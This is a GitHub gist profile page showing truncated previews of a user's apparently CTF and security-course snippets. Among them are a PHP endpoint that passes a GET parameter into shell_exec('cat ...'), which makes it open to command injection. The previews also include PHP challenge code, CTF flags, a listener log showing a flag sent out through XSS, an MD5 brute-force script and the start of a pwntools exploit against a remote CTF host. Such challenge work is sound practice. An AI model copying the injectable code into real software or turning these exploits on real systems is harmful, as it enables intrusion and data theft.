Skip to content

Instantly share code, notes, and snippets.

View honor2016tw's full-sized avatar
:copilot:
No pain no gain

Cheng-Ju (Sam) Shih honor2016tw

:copilot:
No pain no gain
View GitHub Profile
O:4:"User":2:{s:4:"name";s:5:"honor";s:11:"Usertoken";s:32:"0fb3fd5e3a65707c85568cfa566c9731";}
{"output":"<?php\n\nheader('Content-Type: application\/json');\n\nif ($file = @$_GET['get']) {\n $output = shell_exec(\"cat '$file'\");\n \n if ($output !== null) {\n echo json_encode([\n 'output' => $output\n ]);\n } else {\n echo json_encode([\n 'error' => 'cannot get file'\n ]);\n }\n} else {\n echo json_encode([\n 'error' => 'empty file path'\n ]);\n}\n"}
<?php
function run() {
if (isset($_GET['cmd']) && isset($_GET['sig'])) {
$cmd = hash('SHA512', $_SERVER['REMOTE_ADDR']) ^ (string) $_GET['cmd'];
$key = $_SERVER['HTTP_USER_AGENT'].sha1($_SERVER['HTTP_HOST']); // user agent + sha1(request header)
echo "user agent:".$_SERVER['HTTP_USER_AGENT']."\n";
echo "http_host:".$_SERVER['HTTP_HOST']."\n";
echo "remote_addr:".$_SERVER['REMOTE_ADDR']."\n";
$sig = hash_hmac('SHA512', $cmd, $key);
echo "sig:".$sig."\n";
FLAG{PikAPikApikaPikap1Ka}
<?php if (isset($_GET['info'])) die(phpinfo());
$filename = $_GET['f']??"kophp.php";
if (isset($_GET['c']) && strlen($_GET['c']) < 87)
{
$f = "/tmp/" . uniqid(rand() , true);
if (stripos($_GET['c'], "path")) exit();
file_put_contents($f, $_GET['c']);
die($f);
}
strtolower($filename[0]) == "p" ? die("Bad 🍊!") : die(htmlspecialchars(file_get_contents($filename)));
root@whcsc-ubuntu-16:~# php -S 0.0.0.0:808 -t ./
PHP 7.0.33-0ubuntu0.16.04.7 Development Server started at Sun Jan 12 05:08:29 2020
Listening on http://0.0.0.0:808
Document root is /root
Press Ctrl-C to quit.
[Sun Jan 12 05:17:55 2020] 140.113.216.163:58874 [200]: /flag=FLAG%7Bu_r_m3ow_xss_m4ster%7D
#coding=utf-8
from Crypto.Hash import MD5
import sys
target = sys.argv[1]
count = 0
while 1:
h = MD5.new()
h.update('kaibro{}'.format(count))
#!/usr/bin/env python
from pwn import *
context(arch='amd64',log_level='debug')
r = remote('eductf.zoolab.org', 10105 )
binary = ELF('impossible')
libc = ELF('./libc-2.27.so')
r.sendlineafter( ': ' , str(-2147483648))
magic = 0x10a38c
package com.kaibro.rmi;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
public class Client {
public static void main(String[] args) {
String host = "140.113.203.209";
<?php
include_once('flag.php');
echo strlen($fllllllag) . "\n";
if ((isset($_POST['😂']) and isset($_POST['🤣']) and isset($_GET['KEY'])) or isset($_GET['is_this_flag?'])){
echo "A:".$_POST['😂']."\n";
echo "B:".$_POST['🤣']."\n";
echo "C:".$_POST['​😂']."\n";
echo "D:".$_POST['🤣​']."\n";
srand(20191231 + 20200101 + time());
$mystr = 'Happy';